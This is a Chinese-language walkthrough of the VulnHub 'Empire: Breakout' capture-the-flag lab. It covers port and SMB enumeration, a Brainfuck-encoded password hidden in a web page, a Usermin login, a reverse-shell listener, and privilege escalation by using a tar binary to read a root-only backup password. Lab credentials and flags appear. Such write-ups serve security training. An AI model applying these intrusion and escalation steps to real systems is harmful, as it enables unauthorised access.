EMPIRE: BREAKOUT

标签：21 unknown BREAKOUT 3793993001 32 EMPIRE 4104641535 1683874020

Download: https://download.vulnhub.com/empire/02-Breakout.zip

Description

Difficulty: Easy
This box was created to be an Easy box, but it can be Medium if you get lost.
For hints discord Server ( https://discord.gg/7asvAhCEhe )

一：信息收集

netdiscover探测IP

 Currently scanning: Finished!   |   Screen View: Unique Hosts
  
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     50:d2:f5:7c:60:ea      2     120  Beijing Xiaomi Mobile Software Co., Ltd
 192.168.1.223   08:00:27:99:43:a0      1      60  PCS Systemtechnik GmbH
 192.168.1.238   52:96:66:d8:a6:d9      1      60  Unknown vendor

端口扫描

全端口扫描

$ nmap -p- --min-rate 10000 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:23 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00030s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
20000/tcp open  dnp

Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds

版本，--script=default 扫描

$ nmap -p80,139,445,10000,20000 -sV -sC 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:27 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00051s latency).

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 &mdash; Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 &mdash; Document follows

Host script results:
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-05-26T03:27:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.40 seconds

--script=vuln扫描

$ nmap -p80,139,445,10000,20000 --script=vuln 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:29 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00063s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.223
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.223:80/manual/ru/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/es/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/ko/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/pt-br/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/en/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/zh-cn/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/ja/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/fr/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/tr/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/de/index.html
|     Form id: 
|     Form action: https://www.google.com/search
|     
|     Path: http://192.168.1.223:80/manual/da/index.html
|     Form id: 
|_    Form action: https://www.google.com/search
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /manual/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp   open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
10000/tcp open  snet-sensor-mgmt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-vuln-cve2006-3392: 
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|       
|     Disclosure date: 2006-06-29
|     References:
|       http://www.exploit-db.com/exploits/1997/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_      http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_sslv2-drown: 
20000/tcp open  dnp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]

Nmap done: 1 IP address (1 host up) scanned in 52.47 seconds

目录爆破

$ gobuster -u "http://192.168.1.223/" -w /wordlist/directory-list-2.3-medium.txt -x php,txt,html

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.223/
[+] Threads      : 10
[+] Wordlist     : /wordlist/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : html,php,txt
[+] Timeout      : 10s
=====================================================
2023/05/25 23:31:31 Starting gobuster
=====================================================
/index.html (Status: 200)
/manual (Status: 301)
/server-status (Status: 403)
=====================================================
2023/05/25 23:32:46 Finished
=====================================================

不同的whatweb

$ whatweb https://192.168.1.223:10000/
https://192.168.1.223:10000/ [200 OK] Cookies[redirect,testing], Country[RESERVED][ZZ], HTML5, HTTPServer[MiniServ/1.981], HttpOnly[redirect,testing], IP[192.168.1.223], PasswordField[pass], Script, Title[Login to Webmin], UncommonHeaders[auth-type,content-security-policy,x-content-type-options,x-no-links], X-Frame-Options[SAMEORIGIN]

$ whatweb https://192.168.1.223:20000/
https://192.168.1.223:20000/ [200 OK] Cookies[redirect,testing], Country[RESERVED][ZZ], HTML5, HTTPServer[MiniServ/1.830], HttpOnly[redirect,testing], IP[192.168.1.223], PasswordField[pass], Script, Title[Login to Usermin], UncommonHeaders[auth-type,content-security-policy,x-content-type-options,x-no-links], X-Frame-Options[SAMEORIGIN]

主页下面有，下面我展示部分结果

$ curl http://192.168.1.223/
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.


-->

https://ctf.bugku.com/tool/brainfuck

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

.2uqPEfj3D<P'a-3

枚举smb用户

$ enum4linux 192.168.1.223
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 26 00:15:30 2023

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.223
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.223    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 192.168.1.223    |
 ============================================= 
Looking up status of 192.168.1.223
	BREAKOUT        <00> -         B <ACTIVE>  Workstation Service
	BREAKOUT        <03> -         B <ACTIVE>  Messenger Service
	BREAKOUT        <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 192.168.1.223    |
 ====================================== 
[+] Server 192.168.1.223 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.1.223    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 192.168.1.223    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at /usr/bin/enum4linux line 464.
[+] Got OS info for 192.168.1.223 from smbclient: 
[+] Got OS info for 192.168.1.223 from srvinfo:
	BREAKOUT       Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 ============================== 
|    Users on 192.168.1.223    |
 ============================== 
Use of uninitialized value $users in print at /usr/bin/enum4linux line 874.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 877.

Use of uninitialized value $users in print at /usr/bin/enum4linux line 888.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 890.

 ========================================== 
|    Share Enumeration on 192.168.1.223    |
 ========================================== 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.1.223
//192.168.1.223/print$	Mapping: DENIED, Listing: N/A
//192.168.1.223/IPC$	[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 192.168.1.223    |
 ===================================================== 
[E] Dependent program "polenum.py" not present.  Skipping this check.  Download polenum from http://labs.portcullis.co.uk/application/polenum/


 =============================== 
|    Groups on 192.168.1.223    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 192.168.1.223 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1683874020-4104641535-3793993001
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-500 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-502 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-503 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-504 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-505 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-506 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-507 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-508 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-509 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-510 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-511 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-512 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
S-1-5-21-1683874020-4104641535-3793993001-514 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-515 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-516 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-517 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-518 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-519 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-520 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-521 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-522 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-523 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-524 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-525 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-526 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-527 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-528 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-529 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-530 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-531 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-532 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-533 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-534 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-535 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-536 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-537 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-538 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-539 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-540 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-541 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-542 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-543 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-544 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-545 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-546 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-547 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-548 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-549 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-550 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1000 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1001 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1002 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1003 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1004 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1005 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1006 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1007 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1008 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1009 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1010 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1011 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1012 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1013 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1014 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1015 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1016 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1017 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1018 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1019 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1020 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1021 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1022 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1023 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1024 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1025 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1026 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1027 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1028 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1029 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1030 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1031 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1032 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1033 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1034 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1035 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1036 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1037 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1038 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1039 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1040 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1041 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1042 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1043 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1044 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1045 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1046 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1047 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1048 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1049 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)

 ============================================== 
|    Getting printer info for 192.168.1.223    |
 ============================================== 
No printers returned.


enum4linux complete on Fri May 26 00:15:40 2023

二：GetShell

用这个登录，20000端口

username: cyber
password: .2uqPEfj3D<P'a-3
然后反弹Shell

$ nc -lvvp 1234
listening on [any] 1234 ...
192.168.1.223: inverse host lookup failed: Unknown host
connect to [192.168.1.171] from (UNKNOWN) [192.168.1.223] 39648
bash: cannot set terminal process group (1728): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$

user_flag

cyber@breakout:~$ cat user.txt
cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

三：提权

tar -cf 创建一个tar压缩文件

cyber@breakout:~$ ls -la /var/backups/
ls -la /var/backups/
total 28
drwxr-xr-x  2 root root  4096 May 25 23:37 .
drwxr-xr-x 14 root root  4096 Oct 19  2021 ..
-rw-r--r--  1 root root 12732 Oct 19  2021 apt.extended_states.0
-rw-------  1 root root    17 Oct 20  2021 .old_pass.bak
cyber@breakout:~$ ls -l
ls -l
total 1272
-rw-r--r-- 1 cyber cyber 765823 May 26 00:40 linpeas.sh
-rwxr-xr-x 1 root  root  531928 Oct 19  2021 tar
-rw-r--r-- 1 cyber cyber     48 Oct 19  2021 user.txt
cyber@breakout:~$ ./tar -cf pass.tar /var/backups/.old_pass.bak
./tar -cf pass.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ls
ls
linpeas.sh  pass.tar  tar  user.txt
cyber@breakout:~$ tar -xf pass.tar
tar -xf pass.tar
cyber@breakout:~$ ls
ls
linpeas.sh  pass.tar  tar  user.txt  var
cyber@breakout:~$ cd var
cd var
cyber@breakout:~/var$ ls
ls
backups
cyber@breakout:~/var$ cd backups
cd backups
cyber@breakout:~/var/backups$ ls
ls
cyber@breakout:~/var/backups$ ls -la
ls -la
total 12
drwxr-xr-x 2 cyber cyber 4096 May 26 04:16 .
drwxr-xr-x 3 cyber cyber 4096 May 26 04:16 ..
-rw------- 1 cyber cyber   17 Oct 20  2021 .old_pass.bak
cyber@breakout:~/var/backups$ cat .old_pass.bak 
cat .old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~/var/backups$ su  
su
Password: Ts&4&YurgtRX(=~h

root@breakout:/home/cyber/var/backups# id
id
uid=0(root) gid=0(root) groups=0(root)
root@breakout:/home/cyber/var/backups# cd ../
cd ../
root@breakout:/home/cyber/var# cd
cd
root@breakout:~# ls
ls
rOOt.txt
root@breakout:~# cat rOOt.txt
cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Author: Icex64 & Empire Cybersecurity
root@breakout:~#

标签：21,unknown,BREAKOUT,3793993001,32,EMPIRE,4104641535,1683874020
From： https://www.cnblogs.com/vuln/p/17709793.html